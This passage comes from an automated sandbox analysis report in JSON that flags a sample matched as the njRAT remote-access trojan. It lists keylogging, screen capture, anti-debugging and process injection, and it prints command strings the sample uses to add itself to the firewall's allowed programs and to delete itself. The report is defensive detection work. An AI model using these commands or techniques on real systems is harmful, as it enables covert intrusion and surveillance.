00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-106", "type": 2, "relevance": 1, "name": "Contains ability to decode base64 data", "description": "Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-106", "relevance": 1, "name": "Contains ability to decode string content at runtime (Dotnet)", "description": "Observed function \"ToBase64String\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"FromBase64String\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-118", "relevance": 1, "name": "Contains ability to perform crypto operations", "description": "Observed namespace \"System.Security.Cryptography\" in [Source: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"]", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to decode base64 data", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Contains ability to decode base64 data\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains ability to decode string content at runtime (Dotnet)\n Matched sigs: Contains ability to perform crypto operations", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-132", "type": 2, "relevance": 1, "name": "Contains ability to modify the user configuration/privilege (API string)", "description": "Found reference to API \"_SystemParametersInfo\" (Indicator: \"SystemParametersInfo\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SystemParametersInfoA\" (Indicator: \"SystemParametersInfo\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"SystemParametersInfo\" (Indicator: \"SystemParametersInfo\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"_SystemParametersInfo\" (Indicator: \"SystemParametersInfo\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"SystemParametersInfoA\" (Indicator: \"SystemParametersInfo\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found reference to API \"SystemParametersInfo\" (Indicator: \"SystemParametersInfo\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"C:\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"C:\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"system32\\drivers\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\etc\\\\hosts\" (Indicator: \"\\drivers\\\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005756.00000000.65858.00050000.00000004.mdmp, 00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")\n Found string \":\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \":\\WINDOWS\\system32\\drivers\\etc\\hosts\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"MSAFD NetBIOS [\\Device\\NetBT_Tcpip6_{90A066FE-591C-47F3-850D-9644B684FBA5}] DATAGRAM 2\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found reference to API \"36054346951,5744,3179,,AdjustTokenPrivileges,advapi32.dll,\"252:03:58.056\",RX=0,PX=0\" (Indicator: \"AdjustTokenPrivileges\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\77c1dc46ea139bf5e1eaa9b87ef03c7a\\System.Xml.ni.dll\" (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"Shutdown -l\" (Indicator: \"shutdown \") in Source: 6000057-Fransesco~Ind\n Observed string: \"Shutdown -r\" (Indicator: \"shutdown \") in Source: 6000057-Fransesco~Ind\n Observed string: \"Shutdown -s\" (Indicator: \"shutdown \") in Source: 6000057-Fransesco~Ind", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLE5AD3AC1183264D4EADE309D13A44]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"Sleep\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: KERNELBASE.DLL)\n Found string \"Rectangle\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: GDI32.DLL)\n Found string \"GetLogicalDrives\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentProcess\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: KERNELBASE.DLL)\n Found string \"connect\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: WS2_32.DLL)\n Found string \"GetForegroundWindow\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"FindWindowExA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"FindWindowA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"SystemParametersInfoA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"SetWindowPos\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"SwapMouseButton\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"NtSuspendProcess\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: NTDLL.DLL)\n Found string \"NtResumeProcess\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: NTDLL.DLL)\n Found string \"BlockInput\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"NtSetInformationProcess\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: NTDLL.DLL)\n Found string \"ShowCursor\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"EnableWindow\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"GetWindowThreadProcessId\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"GetClassNameA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"SendMessageA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"EnumChildWindows\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"GetWindowTextA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"GetWindowTextLengthA\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"GetWindow\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)\n Found string \"IsWindowVisible\" (Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a, API is part of module: USER32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" at 00000000-00005756-00000105-5396640\n \"netsh.exe\" at 00000000-00005928-00000105-11375687", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-411", "type": 9, "relevance": 3, "name": "Uses a Windows Living Off The Land Binaries (LOL bins)", "description": "Process \"%WINDIR%\\system32\\netsh.exe\" launched with commandline \"netsh firewall add allowedprogram \"C:\\\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" ENABLE\" (UID: 00000000-00005928)", "origin": "Monitored Target"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "string-6", "type": 2, "relevance": 2, "name": "Uses a .NET obfuscator to hide its code", "description": "\"System.IO.Compression\" is a hint for the obfuscator \"MPRESS\"\n \"CompressionMode\" is a hint for the obfuscator \"MPRESS\"", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5756)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Thread ID: 5744) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "string-126", "type": 2, "relevance": 3, "name": "Found system commands related strings", "description": "Found string \"cmd.exe /c ping 0 -n 2 & del \\\"\" (Indicator: \"ping\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"), Found string \"md.exe /c ping 0 -n 2 & del \"\" (Indicator: \"ping\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")\n Found string \"Ping\" (Indicator: \"ping\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-20", "type": 1, "relevance": 5, "name": "Contains ability to enumerate processes/modules/threads", "description": "System.Diagnostics.Process::GetProcessById(System.Int32) at 57b5382e5defa28eb582c820fc05503d-600008a-e~ACT\n System.Diagnostics.Process::GetProcessById(System.Int32) at 57b5382e5defa28eb582c820fc05503d-6000075-AntiTaskManager~protect\n System.Diagnostics.Process::GetProcessesByName(System.String) at 57b5382e5defa28eb582c820fc05503d-6000013-CsAntiProcess~Handler\n System.Diagnostics.Process::GetProcessesByName(System.String) at 57b5382e5defa28eb582c820fc05503d-6000057-Fransesco~Ind", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-40", "type": 6, "relevance": 10, "name": "Calls an API typically used for keylogging", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetAsyncKeyState\" (UID: 00000000-00005756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" called \"GetKeyState\" (UID: 00000000-00005756)", "origin": "API Call", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "string-417", "type": 2, "relevance": 1, "name": "Contains ability to identify remote systems", "description": "Found string \"cmd.exe /c ping 0 -n 2 & del \\\"\" (Indicator: \"cmd.exe /c ping\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"), Found string \"cmd.exe /c ping 0 -n 2 & del \\\"\" (Indicator: \"/c ping\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"md.exe /c ping 0 -n 2 & del \"\" (Indicator: \"/c ping\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\"), Found string \"Ping\" (Indicator: \"ping\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-412", "type": 9, "relevance": 5, "name": "Spawned process connects to a network", "description": "Process \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" connects to <IPv4> on port 24206 (TCP)", "origin": "Monitored Target", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "stream-85", "type": 1, "relevance": 5, "name": "Contains ability to open a port and listen for incoming connection", "description": "Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) at 57b5382e5defa28eb582c820fc05503d-600004f-Fransesco~RegValueGet\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) at 57b5382e5defa28eb582c820fc05503d-6000062-Fransesco~RC\n System.Net.Sockets.TcpClient::Close() at 57b5382e5defa28eb582c820fc05503d-600001e-Fransesco~connect\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) at 57b5382e5defa28eb582c820fc05503d-600004b-Fransesco~fx\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) at 57b5382e5defa28eb582c820fc05503d-6000028-Fransesco~GetAV\n System.Net.Sockets.TcpClient::get_Client() at 57b5382e5defa28eb582c820fc05503d-6000065-Fransesco~Sendb\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) at 57b5382e5defa28eb582c820fc05503d-600002d-Fransesco~RS\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) at 57b5382e5defa28eb582c820fc05503d-6000050-Fransesco~RegValueSet\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) at 57b5382e5defa28eb582c820fc05503d-6000057-Fransesco~Ind\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) at 57b5382e5defa28eb582c820fc05503d-600003f-Fransesco~Send\n Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) at 57b5382e5defa28eb582c820fc05503d-600002a-Fransesco~ZIP", "origin": "Hybrid Analysis Technology", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Remote Access Related", "identifier": "string-30", "type": 2, "relevance": 3, "name": "Contains references to WMI/WMIC", "description": "Found string \"winmgmts:\\\\.\\root\\SecurityCenter2\" (Indicator: \"winmgmts:\"; in File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found string \"winmgmts:\\\\\\\\.\\\\root\\\\SecurityCenter2\" (Indicator: \"winmgmts:\"; in File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"win_exe_njRAT\" matched file \"sample.bin\" (Author: info@fidelissecurity.com)\n YARA signature \"win_njrat_g0\" matched file \"sample.bin\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MAL_Winnti_Sample_May18_1\" matched file \"sample.bin\" as \"Detects malware sample from Burning Umbrella report - Generic Winnti Rule\" (Reference: https://401trg.pw/burning-umbrella/, Author: Florian Roth)\n YARA signature \"MALWARE_Win_NjRAT\" matched file \"sample.bin\" as \"Detects NjRAT / Bladabindi\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 584)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 584)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 584)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "stream-72", "type": 1, "relevance": 3, "name": "Contains ability to capture the screen", "description": "System.Drawing.Graphics::CopyFromScreen(System.Int32,System.Int32,System.Int32,System.Int32,System.Drawing.Size,System.Drawing.CopyPixelOperation) at 57b5382e5defa28eb582c820fc05503d-6000041-Fransesco~CaptureDesktop\n System.Drawing.Graphics::CopyFromScreen(System.Int32,System.Int32,System.Int32,System.Int32,System.Drawing.Size,System.Drawing.CopyPixelOperation) at 57b5382e5defa28eb582c820fc05503d-6000057-Fransesco~Ind", "origin": "Hybrid Analysis Technology", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-7", "type": 7, "relevance": 7, "name": "Uses network protocols on unusual ports", "description": "TCP traffic to <IPv4> on port 24206", "origin": "Network Traffic", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", 